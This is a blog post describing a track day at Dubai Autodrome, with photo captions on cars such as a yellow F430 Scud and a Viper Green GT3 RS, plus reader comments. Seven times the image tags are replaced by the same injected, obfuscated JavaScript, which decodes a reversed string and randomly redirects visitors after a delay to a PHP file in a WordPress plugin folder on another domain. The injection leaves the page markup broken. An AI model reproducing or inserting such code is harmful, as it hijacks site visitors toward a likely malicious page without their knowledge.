Dubai Autodrome. Track Day Action. More testing time

Friday mornings seem to roll around far to quickly at the moment! I’m not sure whether it’s my age or that Dubai Stop Clock that I keep hearing things about. Anywho – when there is an open pit track day on the full GP Circuit (why oh why don’t they use this more often!!!) to be had I’m happy to drag myself out of my pit and head on down.So after a quick chat with Gary Francis and Martin Hope, who were running a couple of race cars for customers, to find out what was about, I jumped in the rig and headed over the road to the Autodrome.Suffice to say I was more than happy with what I found…Mildly pissed that I wasn’t out there in the Golf though; oh well!

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/oct%20track%20day/IMG_0071.jpg” width=”728″ />

John Sinders was out in his impecable and very yellow F430 “Scud”. From what I understand it was an ideal opportunity to get some laps in and take some prospective sponsors out for a wild ride.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/oct%20track%20day/IMG_0041.jpg” width=”728″ />

This isn’t something you see everyday – A 997 Cup car chasing down a Radical SR3. If only I could play a sound byte.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/oct%20track%20day/IMG_0068.jpg” width=”728″ />

I question whether we will see Abu Dhabi registered cars making the effort to drive the hour long trek to the Autodrome when they will have the Yas Marina F1 circuit on their door step. In the mean time though I will be more than happy to snap super cool KTM’s on the hunt for heavy metal…I just wish that X-Bow owners would put a race spec exhaust system on their cars…so muted for a car that looks so evil.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/oct%20track%20day/IMG_0196.jpg” width=”728″ />

Tarek Elgammel was out with his Khaleji Motorsport shirt on driving their ex street spec GT3 RS.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/oct%20track%20day/IMG_0054.jpg” width=”728″ />

If I was asked to pin point one car to drive for the next year – A Viper Green GT3 RS would be it!!! The owner of this car seemed to be doing some odd things with his throttle though on the exit of corners. Word is that he had a close encounter of the concrete kind a bit later in the day.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/oct%20track%20day/IMG_0174.jpg” width=”728″ />

Now, as you know already I am one of the world’s biggest Porsche fans and there is nothing cooler in modern day Porsche circles than a Carrera GT. However and I mean this with no disrespect, why would you take a carbon tub/bodied car and then have it wrapped in fake carbon vinyl?

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/oct%20track%20day/IMG_0095.jpg” width=”728″ />

Christophe out in the AUH SR3 that has been serving him and Buzz so well in Europe.

  1. What is it with Porsches and the walls of the Autodrome? I heard one of the ARM GT3 Cup S cars also had a big meeting up with the barriers before the test day as well. That makes…um….roughly 8 Porsches I can count off the top of my head that’ve waded it up at the Autodrome, of which about 5 are 997 GT3s and another one was a 996 GT3 🙁

    When you have instructors on hand to ride along and teach you how to drive your 300-400k car for only 300 dirhams, there really are no excuses. But oh well, I’ll have fun chasing those types of guys in the Miata I suppose. 😉

    As for the guy with the carbon fibre wrap on the Carrera GT…I’m sure he has impeccable taste and must be doing it to protect the factory paint at all costs.

    Or so I keep telling myself. ;D

    I’ve seen that yellow Scud around Mall of the Emirates…one fine car, that. Must be a pleasure to drive on the track, never knew it was John Sinders’ car though!
